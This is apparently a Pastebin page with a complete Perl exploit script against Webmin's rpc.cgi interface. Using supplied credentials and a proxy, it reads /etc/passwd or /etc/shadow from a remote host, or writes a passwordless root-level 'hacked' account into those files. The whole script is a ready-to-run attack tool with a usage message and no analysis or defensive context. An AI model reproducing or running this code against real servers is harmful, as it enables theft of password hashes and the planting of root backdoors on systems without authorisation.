Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # urlize
- # Convert a string to a form ok for putting in a URL
- sub urlize {
- local $rv = $_[0];
- $rv =~ s/([^A-Za-z0-9])/sprintf("%%%2.2X", ord($1))/ge;
- return $rv;
- }
- # un_urlize(string)
- # Converts a URL-encoded string to the original
- sub un_urlize
- {
- local $rv = $_[0];
- $rv =~ s/\+/ /g;
- $rv =~ s/%(..)/pack("c",hex($1))/ge;
- return $rv;
- }
- # serialise_variable(variable)
- # Converts some variable (maybe a scalar, hash ref, array ref or scalar ref)
- # into a url-encoded string
- sub serialise_variable
- {
- if (!defined($_[0])) {
- return 'UNDEF';
- }
- local $r = ref($_[0]);
- local $rv;
- if (!$r) {
- $rv = &urlize($_[0]);
- }
- elsif ($r eq 'SCALAR') {
- $rv = &urlize(${$_[0]});
- }
- elsif ($r eq 'ARRAY') {
- $rv = join(",", map { &urlize(&serialise_variable($_)) } @{$_[0]});
- }
- elsif ($r eq 'HASH') {
- $rv = join(",", map { &urlize(&serialise_variable($_)).",".
- &urlize(&serialise_variable($_[0]->{$_})) }
- keys %{$_[0]});
- }
- elsif ($r eq 'REF') {
- $rv = &serialise_variable(${$_[0]});
- }
- return ($r ? $r : 'VAL').",".$rv;
- }
- # unserialise_variable(string)
- # Converts a string created by serialise_variable() back into the original
- # scalar, hash ref, array ref or scalar ref.
- sub unserialise_variable
- {
- local @v = split(/,/, $_[0]);
- local ($rv, $i);
- if ($v[0] eq 'VAL') {
- $rv = &un_urlize($v[1]);
- }
- elsif ($v[0] eq 'SCALAR') {
- local $r = &un_urlize($v[1]);
- $rv = \$r;
- }
- elsif ($v[0] eq 'ARRAY') {
- $rv = [ ];
- for($i=1; $i<@v; $i++) {
- push(@$rv, &unserialise_variable(&un_urlize($v[$i])));
- }
- }
- elsif ($v[0] eq 'HASH') {
- $rv = { };
- for($i=1; $i<@v; $i+=2) {
- $rv->{&unserialise_variable(&un_urlize($v[$i]))} =
- &unserialise_variable(&un_urlize($v[$i+1]));
- }
- }
- elsif ($v[0] eq 'REF') {
- local $r = &unserialise_variable($v[1]);
- $rv = \$r;
- }
- elsif ($v[0] eq 'UNDEF') {
- $rv = undef;
- }
- return $rv;
- }
- # encode_base64(string)
- # Encodes a string into base64 format
- sub encode_base64
- {
- local $res;
- pos($_[0]) = 0; # ensure start at the beginning
- while ($_[0] =~ /(.{1,45})/gs) {
- $res .= substr(pack('u', $1), 1)."\n";
- chop($res);
- }
- $res =~ tr|\` -_|AA-Za-z0-9+/|;
- local $padding = (3 - length($_[0]) % 3) % 3;
- $res =~ s/.{$padding}$/'=' x $padding/e if ($padding);
- return $res;
- }
- use Socket;
- if ($#ARGV<6) {die "Usage: exploit.pl proxyIP proxyPort remoteIP remotePort username password command_interface
- command interface should equal one of these:
- 1 - read file /etc/passwd
- 2 - read file /etc/shadow
- 3 - insert into file /etc/passwd (\"hacked:x:0:0:root:/root:/bin/bash\")
- 4 - insert into file /etc/shadow (\"hacked::0:99999:7:-1:-1:134538548\")
- ";}
- $username = $ARGV[4];
- $password = $ARGV[5];
- $proxyPort = $ARGV[1];
- $proxyIP = $ARGV[0];
- $remoteIP = $ARGV[2];
- $remotePort = $ARGV[3];
- $command_interface = $ARGV[6];
- $target = inet_aton($proxyIP);
- $paddr = sockaddr_in($proxyPort, $target);
- print "Connecting to: $proxyIP:$proxyPort, with the following user: $username and password: $password. Hacking server:
- $remoteIP:$remotePort\n";
- $auth = &encode_base64("$username:$password");
- $auth =~ s/\n//g;
- if (($command_interface eq 1) || ($command_interface eq 3))
- {
- $d = { 'action' => 'read', 'file' => "/etc/passwd", 'session' => "0"};
- }
- if (($command_interface eq 2) || ($command_interface eq 4))
- {
- $d = { 'action' => 'read', 'file' => "/etc/shadow", 'session' => "0"};
- }
- $tostr = &serialise_variable($d);
- $lengthstr = length($tostr);
- $request = "POST /rpc.cgi HTTP/1.1
- Host: $remoteIP:$remotePort
- User-agent: Webmin
- Authorization: basic $auth
- Content-Length: $lengthstr
- $tostr";
- print "Sending:\n---\n$request\n---\n";
- $proto = getprotobyname('tcp');
- socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n");
- connect(S, $paddr) || die "connect: $!";
- select(S); $|=1; # print $pstr;
- print $request;
- $found = 0;
- while(<S>)
- {
- if (($found == 1) || (/^\r\n/))
- {
- if ($found == 0)
- {
- $found = 1;
- }
- else
- {
- $in = join ("", $in, $_);
- }
- }
- }
- select(STDOUT);
- print "Raw:\n---\n$in\n---\n";
- print "Unserialized:\n---\n", unserialise_variable($in)->{'rv'}, "\n---\n";
- close(S);
- if ($command_interface eq 3)
- {
- $d = { 'action' => 'write', 'data'=>join("", unserialise_variable($in)->{'rv'}, "hacked:x:0:0:root:/root:/bin/bash\n"), 'file' =>
- "/etc/passwd", 'session' => "0"};
- }
- if ($command_interface eq 4)
- {
- $d = { 'action' => 'write', 'data'=>join("", unserialise_variable($in)->{'rv'}, "hacked::0:99999:7:-1:-1:134538548\n"), 'file' =>
- "/etc/shadow", 'session' => "0"};
- }
- $tostr = &serialise_variable($d);
- $lengthstr = length($tostr);
- $request = "POST /rpc.cgi HTTP/1.1
- Host: $remoteIP:$remotePort
- User-agent: Webmin
- Authorization: basic $auth
- Content-Length: $lengthstr
- $tostr";
- print "Sending:\n---\n$request\n---\n";
- $proto = getprotobyname('tcp');
- socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n");
- connect(S, $paddr) || die "connect: $!";
- select(S); $|=1; # print $pstr;
- print $request;
- $found = 0;
- while(<S>)
- {
- if (($found == 1) || (/^\r\n/))
- {
- if ($found == 0)
- {
- $found = 1;
- }
- else
- {
- $in = join ("", $in, $_);
- }
- }
- }
- select(STDOUT);
- print "Raw:\n---\n$in\n---\n";
- print "Unserialized:\n---\n", unserialise_variable($in)->{'rv'}, "\n---\n";
- close(S);
- # --- EOF ---
Add Comment
Please, Sign In to add comment